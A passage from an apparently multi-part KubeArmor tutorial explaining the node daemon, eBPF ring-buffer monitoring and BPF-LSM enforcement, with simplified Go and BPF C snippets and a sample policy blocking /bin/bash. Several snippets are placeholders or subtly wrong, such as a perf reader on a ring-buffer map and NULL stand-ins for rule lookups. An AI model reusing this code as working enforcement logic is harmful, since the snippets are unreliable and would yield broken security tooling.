if err := be.BPFContainerMap.Update(containerMapKey, containerMapValue, cle.UpdateAny); err != nil {
be.Logger.Warnf("Error updating BPF map for container %s: %v", containerID, err)
}
// ... More complex logic would add rules to an inner map associated with this containerMapKey
}
Welcome back to the KubeArmor tutorial! In our journey so far, we've explored the key components that make KubeArmor work:
Security Policies: Your rulebooks for security.
Container/Node Identity: How KubeArmor knows who is doing something.
Runtime Enforcer: The component that translates policies into kernel rules and blocks forbidden actions.
System Monitor: KubeArmor's eyes and ears, observing system events.
BPF (eBPF): The powerful kernel technology powering much of the monitoring and enforcement.
In this chapter, we'll look at the KubeArmor Daemon. If the other components are like specialized tools or senses, the KubeArmor Daemon is the central brain and orchestrator that lives on each node. It brings all these pieces together, allowing KubeArmor to function as a unified security system.
The KubeArmor Daemon is the main program that runs on every node (Linux server) where you want KubeArmor to provide security. When you install KubeArmor, you typically deploy it as a DaemonSet in Kubernetes, ensuring one KubeArmor Daemon pod runs on each of your worker nodes. If you're using KubeArmor outside of Kubernetes (on a standalone Linux server or VM), the daemon runs directly as a system service.
Think of the KubeArmor Daemon as the manager for that specific node. Its responsibilities include:
Starting and stopping all the other KubeArmor components (System Monitor, Runtime Enforcer, Log Feeder).
Communicating with external systems like the Kubernetes API server or the container runtime (Docker, containerd, CRI-O) to get information about running workloads and policies.
Building and maintaining the internal mapping for Container/Node Identity.
Fetching and processing Security Policies (KSP, HSP, CSP) that apply to the workloads on its node.
Instructing the Runtime Enforcer on which policies to load and enforce for specific containers and the host.
Receiving security events and raw data from the System Monitor.
Adding context (like identity) to raw events received from the monitor.
Forwarding processed logs and alerts to the Log Feeder for external consumption.
Handling configuration changes and responding to shutdown signals.
Without the Daemon, the individual components couldn't work together effectively to provide end-to-end security.
Let's trace the journey of a security policy and a system event, highlighting the Daemon's role.
Imagine you want to protect a specific container, say a database pod with the label app: my-database, by blocking it from executing the /bin/bash command. You create a KubeArmor Policy (KSP) like this:
# Simplified KSP
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
name: block-bash-in-db
namespace: default
spec:
selector:
matchLabels:
app: my-database
process:
matchPaths:
- path: /bin/bash
action: Block
And let's say later, a process inside that database container actually attempts to run /bin/bash.
Here's how the KubeArmor Daemon on the node hosting that database pod orchestrates the process:
Policy Discovery: The KubeArmor Daemon, which is watching the Kubernetes API server, detects your new block-bash-in-db policy.
Identify Targets: The Daemon processes the policy's selector (app: my-database). It checks its internal state (built by talking to the Kubernetes API and container runtime) to find which running containers/pods on its node match this label. It identifies the specific database container.
Prepare Enforcement: The Daemon takes the policy rule (Block /bin/bash) and tells its Runtime Enforcer component to load this rule specifically for the identified database container. The Enforcer translates this into the format needed by the underlying OS security module (AppArmor, SELinux, or BPF-LSM) and loads it into the kernel.
System Event: A process inside the database container tries to execute /bin/bash.
Event Detection & Enforcement: The OS kernel intercepts this action. If using BPF-LSM, the Runtime Enforcer's BPF program checks the loaded policy rules (which the Daemon put there). It sees the rule to Block /bin/bash for this container's identity. The action is immediately blocked by the kernel.
Event Monitoring & Context: Simultaneously, the System Monitor's BPF programs also detect the exec attempt on /bin/bash. It collects details like the process ID, the attempted command, and the process's Namespace IDs. It sends this raw data to the Daemon (via a BPF ring buffer).
Event Processing: The Daemon receives the raw event from the Monitor. It uses the Namespace IDs to look up the Container/Node Identity in its internal map, identifying that this event came from the database container (app: my-database). It sees the event includes an error code indicating it was blocked by the security module.
Log Generation: The Daemon formats a detailed log/alert message containing all the information: the event type (process execution), the command (/bin/bash), the outcome (Blocked), and the workload identity (container ID, Pod Name, Namespace, Labels).
Log Forwarding: The Daemon sends this formatted log message to its Log Feeder component, which then forwards it to your configured logging/monitoring system.
This diagram illustrates how the Daemon acts as the central point, integrating information flow and control between external systems (K8s, CRI), the low-level kernel components (Monitor, Enforcer), and the logging/alerting system.
Let's look at the core structure representing the KubeArmor Daemon in the code. It holds references to all the components it manages and the data it needs.
Referencing KubeArmor/core/kubeArmor.go:
// KubeArmorDaemon Structure (Simplified)
type KubeArmorDaemon struct {
// node information
Node tp.Node
NodeLock *sync.RWMutex
// flag
K8sEnabled bool
// K8s pods, containers, endpoints, owner info
// These map identity details collected from K8s/CRI
K8sPods []tp.K8sPod
K8sPodsLock *sync.RWMutex
Containers map[string]tp.Container
ContainersLock *sync.RWMutex
EndPoints []tp.EndPoint
EndPointsLock *sync.RWMutex
OwnerInfo map[string]tp.PodOwner
// Security policies watched from K8s API
SecurityPolicies []tp.SecurityPolicy
SecurityPoliciesLock *sync.RWMutex
HostSecurityPolicies []tp.HostSecurityPolicy
HostSecurityPoliciesLock *sync.RWMutex
// logger component
Logger *fd.Feeder
// system monitor component
SystemMonitor *mon.SystemMonitor
// runtime enforcer component
RuntimeEnforcer *efc.RuntimeEnforcer
// Used for managing background goroutines
WgDaemon sync.WaitGroup
// ... other fields for health checks, state agent, etc. ...
}
Explanation:
The KubeArmorDaemon struct contains fields like Node (details about the node it runs on), K8sEnabled (whether it's in a K8s cluster), and maps/slices to store information about K8sPods, Containers, EndPoints, and parsed SecurityPolicies. Locks (*sync.RWMutex) are used to safely access this shared data from multiple parts of the Daemon's logic.
Crucially, it has pointers to the other main components: Logger, SystemMonitor, and RuntimeEnforcer. This shows that the Daemon owns and interacts with instances of these components.
WgDaemon is a sync.WaitGroup used to track background processes (goroutines) started by the Daemon, allowing for a clean shutdown.
When KubeArmor starts on a node, the KubeArmor() function in KubeArmor/main.go (which calls into KubeArmor/core/kubeArmor.go) initializes and runs the Daemon.
Here's a simplified look at the initialization steps within the KubeArmor() function:
// KubeArmor Function (Simplified)
func KubeArmor() {
// create a daemon instance
dm := NewKubeArmorDaemon()
// dm is our KubeArmorDaemon object on this node
// ... Node info setup (whether in K8s or standalone) ...
// initialize log feeder component
if !dm.InitLogger() {
// handle error and destroy daemon
return
}
dm.Logger.Print("Initialized KubeArmor Logger")
// Start logger's background process to serve feeds
go dm.ServeLogFeeds()
// ... StateAgent, Health Server initialization ...
// initialize system monitor component
if cfg.GlobalCfg.Policy || cfg.GlobalCfg.HostPolicy { // Only if policy/hostpolicy is enabled
if !dm.InitSystemMonitor() {
// handle error and destroy daemon
return
}
dm.Logger.Print("Initialized KubeArmor Monitor")
// Start system monitor's background processes to trace events
go dm.MonitorSystemEvents()
// initialize runtime enforcer component
// It receives the SystemMonitor instance because the BPF enforcer
// might need info from the monitor (like pin paths)
if !dm.InitRuntimeEnforcer(dm.SystemMonitor.PinPath) {
dm.Logger.Print("Disabled KubeArmor Enforcer since No LSM is enabled")
} else {
dm.Logger.Print("Initialized KubeArmor Enforcer")
}
// ... Presets initialization ...
}
// ... K8s/CRI specific watching for Pods/Containers/Policies ...
// wait for a while (initialization sync)
// ... Policy and Pod watching (K8s specific) ...
// listen for interrupt signals to trigger shutdown
sigChan := GetOSSigChannel()
<-sigChan // This line blocks until a signal is received
// destroy the daemon (calls Close methods on components)
dm.DestroyKubeArmorDaemon()
}
// NewKubeArmorDaemon Function (Simplified)
func NewKubeArmorDaemon() *KubeArmorDaemon {
dm := new(KubeArmorDaemon)
// Initialize maps, slices, locks, and component pointers to nil/empty
dm.NodeLock = new(sync.RWMutex)
dm.K8sPodsLock = new(sync.RWMutex)
dm.ContainersLock = new(sync.RWMutex)
dm.EndPointsLock = new(sync.RWMutex)
dm.SecurityPoliciesLock = new(sync.RWMutex)
dm.HostSecurityPoliciesLock = new(sync.RWMutex)
dm.DefaultPosturesLock = new(sync.Mutex)
dm.ActivePidMapLock = new(sync.RWMutex)
dm.MonitorLock = new(sync.RWMutex)
dm.Containers = map[string]tp.Container{}
dm.EndPoints = []tp.EndPoint{}
dm.OwnerInfo = map[string]tp.PodOwner{}
dm.DefaultPostures = map[string]tp.DefaultPosture{}
dm.ActiveHostPidMap = map[string]tp.PidMap{}
// Pointers to components (Logger, Monitor, Enforcer) are initially nil
return dm
}
// InitSystemMonitor Function (Called by Daemon)
func (dm *KubeArmorDaemon) InitSystemMonitor() bool {
// Create a new SystemMonitor instance, passing it data it needs
dm.SystemMonitor = mon.NewSystemMonitor(
&dm.Node, &dm.NodeLock, // Node info
dm.Logger, // Reference to the logger
&dm.Containers, &dm.ContainersLock, // Container identity info
&dm.ActiveHostPidMap, &dm.ActivePidMapLock, // Host process identity info
&dm.MonitorLock, // Monitor's own lock
)
if dm.SystemMonitor == nil {
return false
}
// Initialize BPF inside the monitor
if err := dm.SystemMonitor.InitBPF(); err != nil {
return false
}
return true
}
// InitRuntimeEnforcer Function (Called by Daemon)
func (dm *KubeArmorDaemon) InitRuntimeEnforcer(pinpath string) bool {
// Create a new RuntimeEnforcer instance, passing it data/references
dm.RuntimeEnforcer = efc.NewRuntimeEnforcer(
dm.Node, // Node info
pinpath, // BPF pin path from the monitor
dm.Logger, // Reference to the logger
dm.SystemMonitor, // Reference to the monitor (for BPF integration needs)
)
return dm.RuntimeEnforcer != nil
}
Explanation:
NewKubeArmorDaemon is like the constructor; it creates the Daemon object and initializes its basic fields and locks. Pointers to components like Logger, SystemMonitor, and RuntimeEnforcer are initially zeroed.
The main KubeArmor() function then calls dedicated Init... methods on the dm object (like dm.InitLogger(), dm.InitSystemMonitor(), dm.InitRuntimeEnforcer()).
These Init... methods are responsible for creating the actual instances of the other components using their respective New... functions (e.g., mon.NewSystemMonitor()) and assigning the returned object to the Daemon's pointer field (dm.SystemMonitor = ...). They pass necessary configuration and references (like the Logger) to the components they initialize.
After initializing components, the Daemon starts goroutines (using go dm.SomeFunction()) for tasks that need to run continuously in the background, like serving logs, monitoring system events, or watching external APIs.
The main flow then typically waits for a shutdown signal (<-sigChan).
When a signal is received, dm.DestroyKubeArmorDaemon() is called, which in turn calls Close... methods on the components to shut them down gracefully.
This demonstrates the Daemon's role in the lifecycle: it's the entity that brings the other parts to life, wires them together by passing references, starts their operations, and orchestrates their shutdown.
The Daemon isn't just starting components; it's managing the flow of information:
Policies In: The Daemon actively watches the Kubernetes API (or receives updates in non-K8s mode) for changes to KubeArmor policies. When it gets a policy, it stores it in its SecurityPolicies or HostSecurityPolicies lists and notifies the Runtime Enforcer to update the kernel rules for affected workloads.
Identity Management: The Daemon watches Pod/Container/Node events from Kubernetes and the container runtime. It populates internal structures (like the Containers map) which are then used by the System Monitor to correlate raw kernel events with workload identity (Container/Node Identity). While the NsMap itself might live in the Monitor (as seen in Chapter 4 context), the Daemon is responsible for gathering the initial K8s/CRI data needed to populate that map.
Events Up: The System Monitor constantly reads raw event data from the kernel (via the BPF ring buffer). It performs the initial lookup using the Namespace IDs and passes the enriched events (likely via Go channels, as hinted in Chapter 4 code) back to the Daemon or a component managed by the Daemon (like the logging pipeline within the Feeder).
Logs Out: The Daemon (or its logging pipeline) takes these enriched events and passes them to the Log Feeder component. The Log Feeder is then responsible for sending these logs/alerts to the configured output destinations.
The Daemon acts as the central switchboard, ensuring that policies are delivered to the enforcement layer, that kernel events are enriched with workload context, and that meaningful security logs and alerts are generated and sent out.
| Responsibility | Description | Interacts With |
| --- | --- | --- |
| Component Management | Starts, stops, and manages the lifecycle of Monitor, Enforcer, Logger. | System Monitor, Runtime Enforcer, Log Feeder |
| External Comm. | Watches K8s API for policies & workload info; interacts with CRI. | Kubernetes API Server, Container Runtimes (Docker, containerd, CRI-O) |
| Identity Building | Gathers data (Labels, Namespaces, Container IDs, PIDs, NS IDs) to map low-level events to workloads. | Kubernetes API Server, Container Runtimes, OS Kernel (/proc) |
| Policy Processing | Fetches policies, identifies targeted workloads on its node. | Kubernetes API Server, Internal state (Identity) |
| Enforcement Orchest. | Tells the Runtime Enforcer which policies to load for which workload. | Runtime Enforcer, Internal state (Identity, Policies) |
| Event Reception | Receives raw or partially processed events from the Monitor. | System Monitor (via channels/buffers) |
| Event Enrichment | Adds full workload identity and policy context to incoming events. | System Monitor, Internal state (Identity, Policies) |
| Logging/Alerting | Formats events into structured logs/alerts and passes them to the Log Feeder. | Log Feeder, Internal state (Enriched Events) |
| Configuration/Signal | Reads configuration, handles graceful shutdown requests. | Configuration files/API, OS Signals |
This table reinforces that the Daemon is the crucial integration layer on each node.
In this chapter, you learned that the KubeArmor Daemon is the core process running on each node, serving as the central orchestrator for all other KubeArmor components. It's responsible for initializing, managing, and coordinating the System Monitor (eyes/ears), Runtime Enforcer (security guard), and Log Feeder (reporter). You saw how it interacts with Kubernetes and container runtimes to understand Container/Node Identity and fetch Security Policies, bringing all the pieces together to enforce your security posture and report violations.
Understanding the Daemon's central role is key to seeing how KubeArmor operates as a cohesive system on each node. In the final chapter, we'll focus on where all the security events observed by the Daemon and its components end up: the Log Feeder.
Welcome back to the KubeArmor tutorial! In the previous chapter, we explored the System Monitor, KubeArmor's eyes and ears inside the operating system, responsible for observing runtime events like file accesses, process executions, and network connections. We learned that the System Monitor uses a powerful kernel technology called eBPF to achieve this deep visibility with low overhead.
In this chapter, we'll take a closer look at BPF (Extended Berkeley Packet Filter), or eBPF as it's more commonly known today. This technology isn't just used by the System Monitor; it's also a key enforcer type available to the Runtime Enforcer component in the form of BPF-LSM. Understanding eBPF is crucial to appreciating how KubeArmor works at a fundamental level within the Linux kernel.
Imagine the Linux kernel as the central operating system managing everything on your computer or server. Traditionally, if you wanted to add new monitoring, security, or networking features deep inside the kernel, you had to write C code, compile it as a kernel module, and load it. This is risky because bugs in kernel modules can crash the entire system.
eBPF provides a safer, more flexible way to extend kernel functionality. Think of it as a miniature, highly efficient virtual machine running inside the kernel. It allows you to write small programs that can be loaded into the kernel and attached to specific "hooks" (points where interesting events happen).
Here's the magic:
Safe: eBPF programs are verified by a kernel component called the "verifier" before they are loaded. The verifier ensures the program won't crash the kernel, hang, or access unauthorized memory.
Performant: eBPF programs run directly in the kernel's execution context when an event hits their hook. They are compiled into native machine code for the processor using a "Just-In-Time" (JIT) compiler, making them very fast.
Flexible: They can be attached to various hooks for monitoring or enforcement, including system calls, network events, tracepoints, and even Linux Security Module (LSM) hooks.
Data Sharing: eBPF programs can interact with user-space programs (like the KubeArmor Daemon) and other eBPF programs using shared data structures called BPF Maps.
KubeArmor needs to operate deep within the operating system to provide effective runtime security for containers and nodes. It needs to:
See Everything: Monitor low-level system calls and kernel events across different container namespaces (Container/Node Identity).
Act Decisively: Enforce security policies by blocking forbidden actions before they can harm the system.
Do it Efficiently: Minimize the performance impact on your applications.
eBPF is the perfect technology for this:
Deep Visibility: By attaching eBPF programs to kernel hooks, KubeArmor's System Monitor gets high-fidelity data about system activities as they happen.
High-Performance Enforcement: When used as a Runtime Enforcer via BPF-LSM, eBPF programs can quickly check policies against events directly within the kernel, blocking actions instantly without the need to switch back and forth between kernel and user space for every decision.
Low Overhead: eBPF's efficiency means it adds minimal latency to system calls compared to older kernel security mechanisms or relying purely on user-space monitoring.
Kernel Safety: KubeArmor can extend kernel behavior for security without the risks associated with traditional kernel modules.
Let's look at how BPF powers both sides of KubeArmor's runtime protection:
As we saw in Chapter 4, the System Monitor observes events. This is primarily done using eBPF.
How it works: Small eBPF programs are attached to kernel hooks related to file, process, network, etc., events. When an event triggers a hook, the eBPF program runs. It collects relevant data (like the path, process ID, Namespace IDs) and writes this data into a special shared memory area called a BPF Ring Buffer.
Getting Data to KubeArmor: The KubeArmor Daemon (KubeArmor Daemon) in user space continuously reads events from this BPF Ring Buffer.
Context: The daemon uses the Namespace IDs from the event data to correlate it with the specific container or node (Container/Node Identity) before processing and sending the alert via the Log Feeder.
Simplified view of monitoring data flow:
This shows the efficient flow: the kernel triggers a BPF program, which quickly logs data to a buffer that KubeArmor reads asynchronously.
Let's revisit a simplified code concept for the BPF monitoring program side (C code compiled to BPF):
// Simplified BPF C code for monitoring (part of system_monitor.c)
struct event {
u64 ts;
u32 pid_id; // PID Namespace ID
u32 mnt_id; // Mount Namespace ID
u32 event_id; // Type of event
char comm[16]; // Process name
char path[256]; // File path or network info
};
// Define a BPF map of type RINGBUF for sending events to user space
struct {
__uint(type, BPF_MAP_TYPE_RINGBUF);
__uint(max_entries, 1 << 24);
} kubearmor_events SEC(".maps"); // This name is referenced in Go code
SEC("kprobe/sys_enter_openat") // Attach to the openat syscall entry
int kprobe__sys_enter_openat(struct pt_regs *ctx) {
struct event *task_info;
// Reserve space in the ring buffer
task_info = bpf_ringbuf_reserve(&kubearmor_events, sizeof(*task_info), 0);
if (!task_info)
return 0; // Could not reserve space, drop event
// Populate the event data
task_info->ts = bpf_ktime_get_ns();
struct task_struct *task = (struct task_struct *)bpf_get_current_task();
task_info->pid_id = get_task_pid_ns_id(task); // Helper to get NS ID
task_info->mnt_id = get_task_mnt_ns_id(task); // Helper to get NS ID
task_info->event_id = 1; // Example: 1 for file open
bpf_get_current_comm(&task_info->comm, sizeof(task_info->comm));
// Get path argument (simplified greatly)
// Note: Real BPF code needs careful handling of user space pointers
const char *pathname = (const char *)PT_REGS_PARM2(ctx);
bpf_probe_read_str(task_info->path, sizeof(task_info->path), pathname);
// Submit the event to the ring buffer
bpf_ringbuf_submit(task_info, 0);
return 0;
}
Explanation:
struct event: Defines the structure of the data sent for each event.
kubearmor_events: Defines a BPF map of type RINGBUF. This is the channel for kernel -> user space communication.
SEC("kprobe/sys_enter_openat"): Specifies where this program attaches: at the entry of the openat system call.
bpf_ringbuf_reserve: Allocates space in the ring buffer for a new event.
bpf_ktime_get_ns, bpf_get_current_task, bpf_get_current_comm, bpf_probe_read_str: BPF helper functions used to get data from the kernel context (timestamp, task info, command name, string from user space).
bpf_ringbuf_submit: Sends the prepared event data to the ring buffer.
On the Go side, KubeArmor's System Monitor uses the cilium/ebpf library to load this BPF object file and read from the kubearmor_events map (the ring buffer).
// Simplified Go code for reading BPF events (part of systemMonitor.go)
// systemMonitor Structure (relevant parts)
type SystemMonitor struct {
// ... other fields ...
SyscallPerfMap *perf.Reader // Represents the connection to the ring buffer
// ... other fields ...
}
// Function to load BPF objects and start reading
func (mon *SystemMonitor) StartBPFMonitoring() error {
// Load the compiled BPF code (.o file)
objs := &monitorObjects{} // monitorObjects corresponds to maps and programs in the BPF .o file
if err := loadMonitorObjects(objs, nil); err != nil {
return fmt.Errorf("failed to load BPF objects: %w", err)
}
// mon.bpfObjects = objs // Store loaded objects (simplified)
// Open the BPF ring buffer map for reading
// "kubearmor_events" matches the map name in the BPF C code
rd, err := perf.NewReader(objs.KubearmorEvents, os.Getpagesize())
if err != nil {
objs.Close() // Clean up loaded objects
return fmt.Errorf("failed to create BPF ring buffer reader: %w", err)
}
mon.SyscallPerfMap = rd // Store the reader
// Start a goroutine to read events from the buffer
go mon.readEvents()
// ... Attach BPF programs to hooks (simplified out) ...
return nil
}
// Goroutine function to read events
func (mon *SystemMonitor) readEvents() {
for {
record, err := mon.SyscallPerfMap.Read() // Read a raw event from the kernel
if err != nil {
// ... error handling, check if reader was closed ...
return
}
// Process the raw event data (parse bytes, add context)
// As shown in Chapter 4 context:
// dataBuff := bytes.NewBuffer(record.RawSample)
// ctx, err := readContextFromBuff(dataBuff) // Parses struct event
// ... lookup containerID using ctx.PidID, ctx.MntID ...
// ... format and send event for logging ...
}
}
Explanation:
loadMonitorObjects: Loads the compiled BPF program and map definitions from the .o file.
perf.NewReader(objs.KubearmorEvents, ...): Opens a reader for the specific BPF map named kubearmor_events defined in the BPF code. This map is configured as a ring buffer.
mon.SyscallPerfMap.Read(): Blocks until an event is available in the ring buffer, then reads the raw bytes sent by the BPF program.
The rest of the readEvents function (simplified out, but hinted at in Chapter 4 context) involves parsing these bytes back into a struct, looking up the container/node identity, and processing the event.
This demonstrates how BPF allows a low-overhead kernel component (the BPF program writing to the ring buffer) and a user-space component (KubeArmor Daemon reading from the buffer) to communicate efficiently.
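To make the user-space side of this exchange more concrete, here is a minimal, self-contained sketch (not KubeArmor's actual readContextFromBuff implementation) of how the raw bytes in record.RawSample could be decoded back into a Go struct. The eventData type and its field layout are assumptions that simply mirror the simplified struct event shown above; the real structure in KubeArmor carries more fields.
// Hypothetical sketch: decoding raw ring buffer bytes into a Go struct
package main

import (
	"bytes"
	"encoding/binary"
	"fmt"
)

// eventData is a hypothetical Go mirror of the simplified BPF-side struct event.
type eventData struct {
	Ts      uint64    // timestamp from bpf_ktime_get_ns()
	PidID   uint32    // PID namespace ID
	MntID   uint32    // mount namespace ID
	EventID uint32    // e.g., 1 for file open
	Comm    [16]byte  // process command name
	Path    [256]byte // path copied with bpf_probe_read_str
}

// parseEvent decodes the raw bytes produced by the BPF program, field by field,
// assuming the same ordering and little-endian layout as the C struct above.
func parseEvent(raw []byte) (*eventData, error) {
	var ev eventData
	if err := binary.Read(bytes.NewReader(raw), binary.LittleEndian, &ev); err != nil {
		return nil, fmt.Errorf("failed to decode event: %w", err)
	}
	return &ev, nil
}

func main() {
	// In the real daemon, raw would come from record.RawSample returned by the reader.
	raw := make([]byte, binary.Size(eventData{}))
	ev, err := parseEvent(raw)
	if err != nil {
		panic(err)
	}
	fmt.Printf("pidns=%d mntns=%d event=%d comm=%q\n",
		ev.PidID, ev.MntID, ev.EventID, bytes.TrimRight(ev.Comm[:], "\x00"))
}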
When KubeArmor is configured to use the BPF-LSM Runtime Enforcer, BPF programs are used not just for monitoring, but for making enforcement decisions in the kernel.
How it works: BPF programs are attached to Linux Security Module (LSM) hooks. These hooks are specifically designed points in the kernel where security decisions are made (e.g., before a file is opened, before a program is executed, before a capability is used).
Policy Rules in BPF Maps: KubeArmor translates its Security Policies into a format optimized for quick lookup and stores these rules in BPF Maps. There might be nested maps where an outer map is keyed by Namespace IDs (Container/Node Identity) and inner maps store rules specific to paths, processes, etc., for that workload.
Decision Making: When an event triggers a BPF-LSM hook, the attached eBPF program runs. It uses the current process's Namespace IDs to look up the relevant policy rules in the BPF maps. Based on the rule found (or the default posture if no specific rule matches), the BPF program returns a value to the kernel indicating whether the action should be allowed (0) or blocked (-EPERM, which is kernel speak for "Permission denied").
Event Reporting: Even when an action is blocked, the BPF-LSM program (or a separate monitoring BPF program) will often still send an event to the ring buffer so KubeArmor can log the blocked attempt.
Simplified view of BPF-LSM enforcement flow:
This diagram shows the pre-configuration step (KubeArmor loading the program and rules) and then the fast, kernel-internal decision path when an event occurs.
Let's revisit a simplified BPF C code concept for enforcement (part of enforcer.bpf.c):
// Simplified BPF C code for enforcement (part of enforcer.bpf.c)
// Outer map: PidNS+MntNS -> reference to inner map (simplified to u32 for demo)
struct outer_key {
u32 pid_ns;
u32 mnt_ns;
};
struct {
__uint(type, BPF_MAP_TYPE_HASH_OF_MAPS); // Or HASH, simplified
__uint(max_entries, 256);
__type(key, struct outer_key);
__type(value, u32); // In reality, this points to an inner map
__uint(pinning, LIBBPF_PIN_BY_NAME);
} kubearmor_containers SEC(".maps"); // Matches map name in Go code
// Inner map (concept): Path -> Rule
struct data_t {
u8 processmask; // Flags like RULE_EXEC, RULE_DENY
};
// Inner maps are created/managed by KubeArmor in user space
SEC("lsm/bprm_check_security") // Attach to LSM hook for program execution
int BPF_PROG(enforce_proc, struct linux_binprm *bprm, int ret) {
struct task_struct *t = (struct task_struct *)bpf_get_current_task();
struct outer_key okey;
get_outer_key(&okey, t); // Helper to get PidNS+MntNS
// Look up the container's rules map using Namespace IDs
u32 *inner_map_fd = bpf_map_lookup_elem(&kubearmor_containers, &okey);
if (!inner_map_fd) {
return ret; // No rules for this container, allow by default
}
// Get the program's path (simplified)
struct path f_path = BPF_CORE_READ(bprm->file, f_path);
char path[256];
// Simplified path reading logic...
bpf_probe_read_str(path, sizeof(path), /* path pointer */);
// Look up the rule for this path in the inner map (conceptually)
// struct data_t *rule = bpf_map_lookup_elem(inner_map_fd, &path); // Conceptually
struct data_t *rule = /* Simplified: simulate lookup */ NULL; // Replace with actual map lookup
// Decision logic based on rule and event type (BPF_CORE_READ bprm->file access mode)
if (rule && (rule->processmask & RULE_EXEC)) {
if (rule->processmask & RULE_DENY) {
// Match found and action is DENY, block the execution
// Report event (simplified out)
return -EPERM; // Block
}
// Match found and action is ALLOW (or AUDIT), allow execution
// Report event (if AUDIT) (simplified out)
return ret; // Allow
}
// No specific DENY rule matched. Check default posture (simplified)
u32 default_posture = /* Look up default posture in another map */ 0; // 0 for Allow
if (default_posture == BLOCK_POSTURE) {
// Default is BLOCK, block the execution
// Report event (simplified out)
return -EPERM; // Block
}
return ret; // Default is ALLOW or no default, allow
}
Explanation:
struct outer_key: Defines the key structure for the outer map (kubearmor_containers), using pid_ns and mnt_ns from the process's identity.
kubearmor_containers: A BPF map storing references to other maps (or rule data directly in simpler cases), allowing rules to be organized per container/namespace.
SEC("lsm/bprm_check_security"): Attaches this program to the LSM hook that is called before a new program is executed.
BPF_PROG(...): Macro defining the BPF program function.
get_outer_key: Helper function to get the Namespace IDs for the current task.
bpf_map_lookup_elem(&kubearmor_containers, &okey): Looks up the map (or data) associated with the current process's namespace IDs.
The core logic involves reading event data (like the program path), looking up the corresponding rule in the BPF maps, and returning 0 to allow or -EPERM to block, based on the rule's action flag (RULE_DENY).
Events are also reported to the ring buffer (kubearmor_events) for logging, similar to the monitoring path.
On the Go side, the BPF-LSM Runtime Enforcer component loads these programs and, crucially, populates the BPF Maps with the translated policies.
// Simplified Go code for loading BPF enforcement objects and populating maps (part of bpflsm/enforcer.go)
type BPFEnforcer struct {
// ... other fields ...
objs enforcerObjects // Holds loaded BPF programs and maps
// ... other fields ...
}
// NewBPFEnforcer Function (simplified)
func NewBPFEnforcer(...) (*BPFEnforcer, error) {
be := &BPFEnforcer{}
// Load the compiled BPF code (.o file) containing programs and map definitions
objs := enforcerObjects{} // enforcerObjects corresponds to maps and programs in the BPF .o file
if err := loadEnforcerObjects(&objs, nil); err != nil {
return nil, fmt.Errorf("failed to load BPF objects: %w", err)
}
be.objs = objs // Store loaded objects
// Attach programs to LSM hooks
// The AttachLSM call links the BPF program to the kernel hook
// be.objs.EnforceProc refers to the BPF program defined with SEC("lsm/bprm_check_security")
link, err := link.AttachLSM(link.LSMOptions{Program: objs.EnforceProc})
if err != nil {
objs.Close()
return nil, fmt.Errorf("failed to attach BPF program to LSM hook: %w", err)
}
// be.links = append(be.links, link) // Store link to manage it later (simplified)
// Get references to the BPF maps defined in the C code
// "kubearmor_containers" matches the map name in the BPF C code
be.BPFContainerMap = objs.KubearmorContainers
// ... Attach other programs (file, network, capabilities) ...
// ... Setup ring buffer for alerts (like in monitoring) ...
return be, nil
}
// AddContainerPolicies Function (simplified - conceptual)
func (be *BPFEnforcer) AddContainerPolicies(containerID string, pidns, mntns uint32, policies []tp.SecurityPolicy) error {
// Translate KubeArmor policies (tp.SecurityPolicy) into a format
// suitable for BPF map lookup (e.g., map of paths -> rule flags)
// translatedRules := translatePoliciesToBPFRules(policies)
// Create or get a reference to an inner map for this container (using BPF_MAP_TYPE_HASH_OF_MAPS)
// The key for the outer map is the container's Namespace IDs
outerKey := struct{ PidNS, MntNS uint32 }{pidns, mntns}
// Conceptually:
// innerMap, err := bpf.CreateMap(...) // Create inner map if it doesn't exist
// err = be.BPFContainerMap.Update(outerKey, uint32(innerMap.FD()), ebpf.UpdateAny) // Link outer key to inner map FD
// Populate the inner map with the translated rules
// for path, ruleFlags := range translatedRules {
// ruleData := struct{ ProcessMask, FileMask uint8 }{...} // Map ruleFlags to data_t
// err = innerMap.Update(path, ruleData, ebpf.UpdateAny)
// }
// Simplified Update (directly indicating container exists with rules)
containerMapValue := uint32(1) // Placeholder value
if err := be.BPFContainerMap.Update(outerKey, containerMapValue, ebpf.UpdateAny); err != nil {
return fmt.Errorf("failed to update BPF container map: %w", err)
}
be.Logger.Printf("Loaded BPF-LSM policies for container %s (pidns:%d, mntns:%d)", containerID, pidns, mntns)
return nil
}
Explanation:
loadEnforcerObjects: Loads the compiled BPF enforcement code.
link.AttachLSM: Attaches a specific BPF program (objs.EnforceProc) to a named kernel LSM hook (lsm/bprm_check_security).
be.BPFContainerMap = objs.KubearmorContainers: Gets a handle (reference) to the BPF map defined in the C code. This handle allows the Go program to interact with the map in the kernel.
AddContainerPolicies: This conceptual function shows how KubeArmor translates high-level policies into a kernel-friendly format (e.g., flags like RULE_DENY, RULE_EXEC) and uses BPFContainerMap.Update to populate the maps. The Namespace IDs (pidns, mntns) are used as keys to ensure policies are applied to the correct container context.
This illustrates how KubeArmor uses user-space code to set up the BPF environment in the kernel, loading programs and populating maps. Once this is done, the BPF programs handle enforcement decisions directly within the kernel when events occur.
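The translation step itself (translatePoliciesToBPFRules in the comments above) is only hinted at. The following standalone sketch shows one plausible way a policy's process matchPaths entries could be reduced to the per-path bitmask stored in data_t; the flag values, the pathRule type, and the translateRules helper are hypothetical illustrations rather than KubeArmor's actual implementation.
// Hypothetical sketch: reducing path rules to bitmask flags for a BPF map
package main

import "fmt"

// Hypothetical flag values mirroring the RULE_* constants in the BPF C code;
// the real values live in KubeArmor's BPF headers and may differ.
const (
	ruleExec uint8 = 1 << 0 // corresponds to RULE_EXEC
	ruleDeny uint8 = 1 << 1 // corresponds to RULE_DENY
)

// pathRule is a stand-in for a single process matchPaths entry from a policy.
type pathRule struct {
	Path   string
	Action string // "Allow", "Audit", or "Block"
}

// translateRules produces the per-path bitmasks that would be written into the
// inner BPF map (conceptually: path -> data_t.processmask).
func translateRules(rules []pathRule) map[string]uint8 {
	out := make(map[string]uint8, len(rules))
	for _, r := range rules {
		mask := ruleExec
		if r.Action == "Block" {
			mask |= ruleDeny
		}
		out[r.Path] = mask
	}
	return out
}

func main() {
	rules := []pathRule{
		{Path: "/bin/sleep", Action: "Block"},
		{Path: "/usr/bin/env", Action: "Audit"},
	}
	for path, mask := range translateRules(rules) {
		fmt.Printf("%s -> 0x%02x\n", path, mask)
	}
}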
BPF technology involves several key components:
BPF Programs: Small, safe programs written in a C-like language and compiled to BPF bytecode. They run in the kernel, where KubeArmor uses them to monitor events and enforce policies at hooks.
